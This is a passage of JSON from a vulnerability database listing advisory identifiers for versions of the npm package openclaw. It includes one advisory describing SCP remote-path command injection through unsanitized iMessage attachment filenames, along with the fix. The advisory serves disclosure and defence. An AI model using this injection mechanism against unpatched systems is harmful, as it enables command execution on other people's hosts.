rability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-8jhh-jcqg-mj5p"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hse8-g1e9-dbay"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91122?format=json","vulnerability_id":"VCID-hynd-965v-n3aq","summary":"OpneClaw accepts unsanitized iMessage attachment paths which allowed SCP remote-path command injection\n### Summary\n`openclaw` versions `<= 2026.3.12` accepted unsanitized iMessage remote attachment paths when staging files over SCP, allowing shell metacharacters in the remote path operand.\n\n### Affected Packages / Versions\n- Package: `openclaw` (`npm`)\n- Affected versions: `<= 2026.3.12`\n- Fixed version: `2026.3.13`\n\n### Details\nThe vulnerable path was the remote attachment staging flow in `src/auto-reply/reply/stage-sandbox-media.ts`. When `ctx.MediaRemoteHost` was set, OpenClaw staged the attachment by spawning `/usr/bin/scp` against `<remoteHost>:<remotePath>`. In affected releases, the remote host was normalized but the remote attachment path was not validated for shell metacharacters before being passed to the SCP remote operand. A sender-controlled iMessage attachment filename containing shell metacharacters could therefore trigger command execution on the configured remote host when remote attachment staging was enabled.\n\nThis issue is in scope under OpenClaw's trust model because it crosses an inbound content boundary into host command execution on a configured remote attachment host.\n\n### Fix\n`openclaw@2026.3.13` validates the SCP remote path before spawning `scp`. Current code calls `normalizeScpRemotePath(...)` and rejects paths containing shell metacharacters instead of passing them through to the remote shell.\n\nRegression coverage exists in `src/auto-reply/reply.stage-sandbox-media.scp-remote-path.test.ts` (`rejects remote attachment filenames with shell metacharacters before spawning scp`).\n\n### Fix Commit(s)\n- `a54bf71b4c0cbe554a84340b773df37ee8e959de`\n\nThanks @lintsinghua for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a54bf71b4c0cbe554a84340b773df37ee8e959de","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/a54bf71b4c0cbe554a84340b773df37ee8e959de"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g2f6-pwvx-r275","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g2f6-pwvx-r275"},{"reference_url":"https://github.com/advisories/GHSA-g2f6-pwvx-r275","reference_id":"GHSA-g2f6-pwvx-r275","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g2f6-pwvx-r275"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113139?format=json","purl":"pkg:npm/openclaw@2026.3.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wf